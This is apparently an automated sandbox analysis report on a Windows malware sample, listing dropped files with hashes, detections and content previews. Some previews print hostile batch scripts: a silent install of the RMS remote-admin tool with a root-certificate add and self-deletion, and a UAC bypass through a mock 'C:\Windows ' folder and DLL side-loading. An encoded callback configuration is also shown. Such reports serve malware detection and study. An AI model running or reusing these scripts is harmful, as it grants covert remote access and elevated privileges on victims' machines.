Preview:	.CallbackSettings=//5bAHsANwBGAEEARQA1ADgARQA5AC0AMgA3ADMANgAtADQANAA2ADgALQBBADMARABCAC0AMQA3AEIAQQA5ADkAQQAwAEQANABGAEEAfQBdAA0ACgBpAG4AdABlAHIAbgBhAGwAXwBjAG8AbgBuAGUAYwB0AGkAbwBuAF8AaQBkAD0ALQAtAA0ACgBoAG8AcwB0AD0AZABuAHMALQBpAHAALgBoAGwAZABuAHMALgByAHUADQAKAHAAbwByAHQAPQA1ADYANQAxAA0ACgB0AGUAeAB0AF8AbQBlAHMAcwBhAGcAZQA9AGQAbgBzAC0AaQBwAA0ACgBhAHUAdABvAF8AYwBvAG4AbgBlAGMAdAA9ADEADQAKAHMAdABhAHQAdQBzAD0AMgANAAoAZABpAHMAcABsAGEAeQBfAG4AYQBtAGUAPQBkAG4AcwAtAGkAcAANAAoAZABpAHMAYQBsAGwAbwB3AF8AdAByAGEAeQBfAGMAbwBuAG4AZQBjAHQAPQAwAA0ACgBhAHAAcABlAG4AZABfAGMAbwBtAHAAdQB0AGUAcgBfAG4AYQBtAGUAPQAxAA0ACgANAAoA..General=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjxnZW5lcmFsX3NldHRpbmdzIHZlcnNpb249IjY5MTEwIj48cG9ydD41NjUwPC9wb3J0PjxoaWRlX3RyYXlfaWNvbl9wb3B1cF9tZW51PmZhbHNlPC9oaWRlX3RyYXlfaWNvbl9wb3B1cF9tZW51Pjx0cmF5X21lbnVfaGlkZV9zdG9wPmZhbHNlPC90cmF5X21lbnVfaGlkZV9zdG9wPjxsYW5ndWFnZT5SdXNzaWFuPC9sYW5ndWFnZT48Y2FsbGJhY2tfYXV0b19jb25uZWN0PnRydWU8L2NhbGxiYWNrX2F1dG9fY29ubmVjdD48Y2

C:\ProgramData\Immunity\is-4BBH3.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18549096
Entropy (8bit):	6.562670425038938
Encrypted:	false
SSDEEP:	393216:TtKtPEdu/TfPXsZ8cuWm+aTsOznd4D4wV:TGjPJYu4UwV
MD5:	43B697A1A52D948FCBEAE234C3CBD21E
SHA1:	D277FD70AF98600D833C04D1CF19B856C1FF3873
SHA-256:	234799CE86ABE8ECC1F768E2B319ED43E67E53F65AE9DE1B85E44840F842CCFF
SHA-512:	64D7FDFBC8524C3DFC3ECC1EB50805BA6B4D6904320D7E76CE3557C2496FA692C21F158F6F40407A2CD0064576161F1F263F9910223B9BB71E96CE71E4F02DF2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RMSRemoteAdmin, Description: Yara detected RMS RemoteAdmin tool, Source: C:\ProgramData\Immunity\is-4BBH3.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Immunity\is-4BBH3.tmp, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....D._.................$....G.....@2.......@....@..........................`&......u...........@...................0.......P.. \...P....1.............h....`...............................P......................._...........}...................text............................... ..`.itext..dr.......t.................. ..`.data...L....@.......(..............@....bss....L....P...........................idata.. \...P...^..................@....didata..}.......~..................@....edata.......0......................@..@.tls....h....@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc.....1..P....1.................@..@.....................$..............@..@................

C:\ProgramData\Immunity\is-7MAR4.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	365
Entropy (8bit):	5.0971527579357145
Encrypted:	false
SSDEEP:	6:A3IcpgiJMhoLs3Icpq3/uNQoRKDJmHuNQDYHuNQmhIR8jY2LVlTX/VlTj1KKD:XKfMhmzKq3/uSoRNHuSDYuSWa8Hl5lfX
MD5:	2F97C51DC9FA0BEF75867FFF87463BEE
SHA1:	B1D950C91A16D14348F7176FB9EE7BD9BAD6020D
SHA-256:	95F7C688340BB527D98C43F0C558B936C903AFBA431B39CD24118041D5FA1169
SHA-512:	F361C5B6A22C916B9BB434B553C3DECE38662D867B476D574F51BD420548507A89166DDC2A59DA94FAAB546B47CDFC06D7E3EBBABD65FB79EDC40A6240D4031C
Malicious:	false
Preview:	cd %ALLUSERSPROFILE%\Immunity\CertMgry..setlocal ..certmgr.exe -add -c Sert.cer -s -r localMachine Root......cd %ALLUSERSPROFILE%\Immunity.."rutserv.exe" /silentinstall.."rutserv.exe" /firewall.."rutserv.exe" /start..RD /S/Q "C:\ProgramData\Immunity\CertMgry"..del /s "C:\ProgramData\Immunity\ses.reg"..del /s "C:\ProgramData\Immunity\settings.dat"..del "%~dpnx0"

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5935016132784937
Encrypted:	false
SSDEEP:	6:bV1lek1GaD0JOCEfMuaaD0JOCEfMKQmDv+/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bvGaD0JcaaD0JwQQv+/tAg/0bjSQJ
MD5:	EF85DB7A65E682F1F2A66308A8641E94
SHA1:	BBB0849EF0B1D6DC36D79158F06CD54ECAFD7B17
SHA-256:	DB1583ADD5AB0C2337B6056014D8E69037AB145CB8A565879B2500405D0807D5
SHA-512:	552440A2D8FADAB4A627132BD57161BAF622A3BD43F9F532CFC58D0150418D2CCD56268D9D48DD1A43D83AC19A1293C879857978E5137E035580615C16AC9AA0
Malicious:	false
Preview:	....E..h..(..........yU.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................yU...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x7f0a05a2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09347187639285634
Encrypted:	false
SSDEEP:	6:kXzwl/+KsXRIE11Y8TRXh/0TqKOXzwl/+KsXRIE11Y8TRXh/0TqK:q0+KsXO4blJ2qK80+KsXO4blJ2qK
MD5:	7BBFE4901D01C073D83FD449C13FB3B1
SHA1:	0E534B18D487E2FE65161484046DD284C922DD36
SHA-256:	7031295556C5A86379D15B0FD6C404E6C9B36518F9F3675B62DD7AE3FA2D4152
SHA-512:	39F90383D69B4E6317D83081C0A68E3AA45DE9B7ADB682B32BF1CED3B014DC426D6D6239CFCFAC678905840FEB18C88AD686D55B8D96631BD04EB1270EF4471B
Malicious:	false
Preview:	....... ................e.f.3...w........................&..........w.......y/.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................z.G9.....y/u..................c3.....y/.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.10781952196616401
Encrypted:	false
SSDEEP:	3:izmX1Evldo7l/bJdAtiCTtoll:iKXQHo7t4zTG
MD5:	7D3A1504B8FE2803A1BA2B1463A00D6D
SHA1:	6E6DB3E02593BBDB155B7682F405D7AF49341AE3
SHA-256:	905596E434CE196AF8A2BADFF2FB06799C6C7FEEB7CB3AB455277CCF0E89AEC6
SHA-512:	D19BD44F8399268622258C55AA936B0C7A2AEA40F7E5AE62FD12D61BDCB250F2396926F6AB5E34B6F856E37887BF78B108DBB631EA067C113C90CFEB2E1FE04B
Malicious:	false
Preview:	<........................................3...w.......y/......w...............w.......w....:O.....w....................c3.....y/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk Download File
Process:	C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Apr 8 17:01:40 2021, mtime=Thu Apr 8 17:01:40 2021, atime=Fri Jan 15 04:01:28 2021, length=365, window=hide
Category:	dropped
Size (bytes):	780
Entropy (8bit):	4.602059242949699
Encrypted:	false
SSDEEP:	12:8mMx380RctcCVeyUi0PmqfGNqjA4JT1N0bFOwpJ7pJHm:8mMp8XAi0byWA0jg//1m
MD5:	B9772021F14648551BC2AB9BD381B215
SHA1:	572F6B42A40C0A0E351DAB49F8DB7008C87C1403
SHA-256:	24D4567E22D3CAC7B62DF573B5A02E2744CE3E67219D5A36F4B4CF6CFA6F08CD
SHA-512:	6D6CB514A9AE729C87D70A5711EA46A3907CFE1CF088B39DEE9A9EBBEAC3EDA67F86FB43F27F64B11A312F1FB9AC019022C0B791C82651423524F6E661B8DE9F
Malicious:	false
Preview:	L..................F.... ......9.,.....9.,....G{....m.......................K....P.O. .:i.....+00.../C:\...................`.1......R5...PROGRA~3..H......L..R5.....F..................... .,.P.r.o.g.r.a.m.D.a.t.a.....Z.1......R6...Immunity..B......R5..R6......V........................I.m.m.u.n.i.t.y.....b.2.m.../R.( .install.cmd.H......R5..R5......V........................i.n.s.t.a.l.l...c.m.d.......R...............-.......Q............O......C:\ProgramData\Immunity\install.cmd..#.....\.....\.....\.....\.....\.I.m.m.u.n.i.t.y.\.i.n.s.t.a.l.l...c.m.d...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.I.m.m.u.n.i.t.y.`.......X.......878164...........!a..%.H.VZAj.../...1........-$..!a..%.H.VZAj.../...1........-$.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\ProgramData\Remote Manipulator System\install.log Download File
Process:	C:\ProgramData\Immunity\rutserv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	233
Entropy (8bit):	4.807140099468015
Encrypted:	false
SSDEEP:	6:pVXU7NLmKRLVT0KWVXU7NLhHujHO7e9OVXU1GIkLwmnXjKVCVXU1GIkLOL7:78fDT0KS89BeEfIkRT9fIk6P
MD5:	F480C049A6CC8E5B22767C3A8FF1533B
SHA1:	F8B31C0E3983A5BC6D49DDE3775F0590E96EAC93
SHA-256:	1AB5598633B0AC56429B06FC331F3A7628F3F3067DB5D314A82575138745C0D9
SHA-512:	0F23E310C3EF3AD57297F57EA4117868CE9CF2FA8DDE9937D6B731345FA7DDF616FED6F5E7F91D697AED82DA1461C4621163C29CE4C7B4ABEE1FD17E3EC77DB9
Malicious:	false
Preview:	08-04-2021_11:02:13#T:SilentInstall: installation 69360..08-04-2021_11:02:13#T:SilentInstall: OpenService: service not found. OK..08-04-2021_11:02:14#T:SilentInstall: CreateService. OK..08-04-2021_11:02:14#T:SilentInstall: finished..

C:\ProgramData\is-7TDOG.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	383
Entropy (8bit):	5.101614736577308
Encrypted:	false
SSDEEP:	6:bDSUx2cL4iPeZbpmLp2cLM+BtOx2cL9s2cLZbpmLKAB2FpJoyVl5QoiVlUvKw7wH:nShsSdmMN+BtZwXSdmarPl5z4lc2
MD5:	ACE1A6C2EA9446D1BD4B645D00BC2C46
SHA1:	A9C41E189775DB5A507785C1C527FF9FB7A07BD6
SHA-256:	2B875F4D5F0722425969FD5963FA0276A101CE63DDB91E5960F2860AB0AEDBF4
SHA-512:	1FBA8400D354A46FE3E1B19F8A4D817DF1EF4C1289D42A8A2257AF45838B6B468A0632B9F31239FC45DE11771AA9D9FB0B803A6CDA359B14C24FB05F71BDDBB2
Malicious:	false
Preview:	..mkdir "\\?\C:\Windows " ..mkdir "\\?\C:\Windows \System32"....copy "C:\Windows\System32\PasswordOnWakeSettingFlyout.exe" "C:\Windows \System32\"....copy "uxtheme.dll" "C:\Windows \System32\".."C:\Windows \System32\PasswordOnWakeSettingFlyout.exe"..echo [-] UAC Bypassed ?..TIMEOUT /T 8..del /s "C:\ProgramData\uxtheme.dll"..del /s "C:\ProgramData\pass.exe"..del %0..............

C:\ProgramData\is-PFD3D.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56260
Entropy (8bit):	5.301245226064988
Encrypted:	false
SSDEEP:	768:egAs/cZz3DfEqTIYv4gKNwFPxPePdOKhQ2:JSzrEqTIm4gKN2PxPoIX2
MD5:	531FCC0848CF13FA300600DF16A71A87
SHA1:	20BFF8B5030D74AFBA1B4C20B5C8CC6F75011B62
SHA-256:	5B192BBC069B8AEF74DABB1DD5459BDA8EA2A64A7336DB54E57AFB38569ECE68
SHA-512:	AF8B8BBC666CE3C57E248ACF056A3C65B2E4EEA244C3C8DBB2D3765964407AF93478A3D452A08862501F61994C964DD6048720742413506952395143841673E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&..].h........& .........6......0..........d.............................@................ .........................................R....................P..(...l...X ......d...........................`@..(...................\|...@............................text...............................`.P`.data........0......."..............@.P..rdata.......@.......$..............@.`@.pdata..(....P.......(..............@.0@.xdata.......`.......,..............@.0@.bss.... ....p........................`..edata..R...........................@.0@.idata...............0..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..d............:..............@.0B/4......P............<..............@.PB/19.............. ...>..............@..B/31.....I............^..............@..B/45....."............`..............@..B/57.....

C:\ProgramData\is-R3F67.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10204226
Entropy (8bit):	7.976194432383807
Encrypted:	false
SSDEEP:	196608:Lw+Cvx+UaVrcYF6nP66ZVazTaeZu8Npr83A3NJqgrpFcs:MjVsIYFBgVad93NJqgr1
MD5:	A5E2BB848405DFC3A56FC892B691B614
SHA1:	7BC55828682E93191D6EE4C20E727308D0EEAC6D
SHA-256:	EA5982C7DD3396D89D54BA0F0269B96807AB59111C22503CA5F9E593B78660F3
SHA-512:	0502630B436079AB2660134E6545EF18FC4B0927073B274E3FC4C706F49C417AD36DDD8F166C4A016AC0FA0065B88F75A921BEE3E7029A9A5CB051A5FAA7A954
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...3..\.................j...........~............@.......................................@......@...................`.......@...........Q...........................................................................B..@....P.......................text....P.......R.................. ..`.itext..h....p.......V.............. ..`.data....7.......8...n..............@....bss....lg...............................idata.......@......................@....didata......P......................@....edata.......`......................@..@.tls.........p...........................rdata..]...........................@..@.rsrc....Q.......R..................@..@....................................@..@........................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1wOdXavtlE.exe.log Download File
Process:	C:\Users\user\Desktop\1wOdXavtlE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ssevs.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\ssevs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sssevs.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\sssevs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLV1qE4qpE4Ks29E4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:Mp1qH2HKX9HKnYHKhQnoPtHoxHhAHKzr
MD5:	AA25E65111EC3A1B0F44AC48FDE28F1F
SHA1:	6E2DF24306122794C15C5FDAA14CE9720B58AF16
SHA-256:	56A9B019CD9F725CC5E2BFDD3ABF2D9A4B1608902A37359C9AB97B6A6F4212B8
SHA-512:	1C982649BBAE60FE78B4483FF954AC25E54204F03BCFD3B0BC14A567A8CFACCE0C20FBEAA69179561E76792B515ADBDAE609C1074E4E86BCC9072B1BA7A3C056
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{671D4562-9894-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	42072
Entropy (8bit):	1.9068212441998564
Encrypted:	false
SSDEEP:	96:riZFZE2GWOtNfZgtBNz1WQ7RZhT1m4t1mbNulLUm9h60mLXj2m7h0:riZFZE2GWOtNfKtB/Wo3jtuiLERy
MD5:	0922546B0873603C38340FB85524335A
SHA1:	6C3F26DC76E1DAC5083E7819616EC06CC3ACCB07
SHA-256:	02D64E8EFDF6907B7750ABAE1837642982F1CB5E87F74F5A509B0CB5D9E5C37F
SHA-512:	6E8DB6F148384F71ED3AD532FEE7BB39E0B3BDA62CEBBC2A6FF3C773C7C8A949EC8ACBDB9E0D205CE6879530B8E2DFA3E174EBA80B17D37AB05DE0C623C471CF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{671D4564-9894-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	23664
Entropy (8bit):	1.6806399930565743
Encrypted:	false
SSDEEP:	48:Iwh0Gcpr01Gwpa/OG4pweivGLHp7yefTGwphebGcpPeRTGEpveOGDYp9eCVGGXpz:rhoZGQmaqhyqDStwNhfZWyL
MD5:	E6761D4DF3B338D0BC826866D71C7E56
SHA1:	63FCA989438567EB4F3CD5D198DC6F155CD0932D
SHA-256:	570BDF32D888CABA3399256D8D8A90A68D350CD85B823A852E08D394F97FB54C
SHA-512:	C8AA1157439226237AD2956F79389EBC6EC439754BD27B83F41983D0769769F3A37BD3D18282C0DB61F62105D8ECF01A761D59EB5BC0EC34A74B0D47860CE215
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6D8CBC47-9894-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	23664
Entropy (8bit):	1.6793170761830245
Encrypted:	false
SSDEEP:	48:Iw17GcprAGwpaYG4pwe+QGLHp7ye+ATGwphe+TGcpPe+aTGEpve+0GDYp9e+7rGE:rfZIQIajhyUDhtSN4fHW2L
MD5:	3FF6E9EEAB667386F6FEF02E0562A303
SHA1:	A57AE4BB10E379C0C23BDBF613F4BFC494EED641
SHA-256:	C697BF8BED5473E04D0406243E1B70613086B3243ABF5705B1793E31B4BE39AE
SHA-512:	82E8FDBEF3EF6DFB3ADC67EDD7C51006D334703C40AFAE25BC7BF9EB2F5BD54160E74F07A82F72D016C8340358BB26B45F642874BEEE9AEE4C6B698879A019C5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	16548
Entropy (8bit):	4.515250836029445
Encrypted:	false
SSDEEP:	192:2yrOOOOOOOOOOOOTOOOOOOOOOOOOOOOOOOOOlOOOOOOOOOOOOOOOOOOOOOOCOOO4:93wUorF4JNM3gpxjzre9D
MD5:	C5DB85D450F8B776AB749484E27B92CC
SHA1:	8A725CFC2336D231FB5CB8320E80A7E5B5227C6E
SHA-256:	26C3EC3AF41FF65F168E7B9DE698DC91C843C444CB8CD529B0B0625A5950AF74
SHA-512:	EC39A7CF5E83819961C5C629B7ADED621AB2FEA8E7EB2E4A0A01B01755C77BE61FA991809B1AD740EC916FA29B25B140964277C8112301D6DA7EFDCD1F7ED64A
Malicious:	false
Preview:	.h.t.t.p.s.:././.i.p.l.o.g.g.e.r...o.r.g./.f.a.v.i.c.o.n...i.c.o.>@........@@.... .(@......(...@......... .......................................................................................................................0...,@..+v..)...)...'...'...(...(...(...(...'...'...)...)...+v..,@..0...............................................................................................................................................................................(...,]..)...(...+...,...,...+...........................+...,...,...+...(...)...,]..(...........................................................................................................................................................,...+...(...,...,......)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)......,...,...(...+...+/..........................................................................................................................................),..,......,......)...)...)...).

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1tMzh7[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1 x 1, 1-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.529003957966892
Encrypted:	false
SSDEEP:	3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
MD5:	EC6AAE2BB7D8781226EA61ADCA8F0586
SHA1:	D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
SHA-256:	B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
SHA-512:	AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
Malicious:	false
Preview:	.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\1tncg7[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1 x 1, 1-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.529003957966892
Encrypted:	false
SSDEEP:	3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
MD5:	EC6AAE2BB7D8781226EA61ADCA8F0586
SHA1:	D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
SHA-256:	B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
SHA-512:	AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
Malicious:	false
Preview:	.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
Category:	downloaded
Size (bytes):	16446
Entropy (8bit):	4.504384496819235
Encrypted:	false
SSDEEP:	192:GyrOOOOOOOOOOOOTOOOOOOOOOOOOOOOOOOOOlOOOOOOOOOOOOOOOOOOOOOOCOOOm:N3wUorF4JNM3gpxjzre9
MD5:	DD345AEE82D34847E8ABD2A695302336
SHA1:	87E2444681A0C4D9127B5328740EC8957D7972D1
SHA-256:	377E20A354FD825B9763C87836482BB7B79D2794E6D25ED693376CA33EAC990A
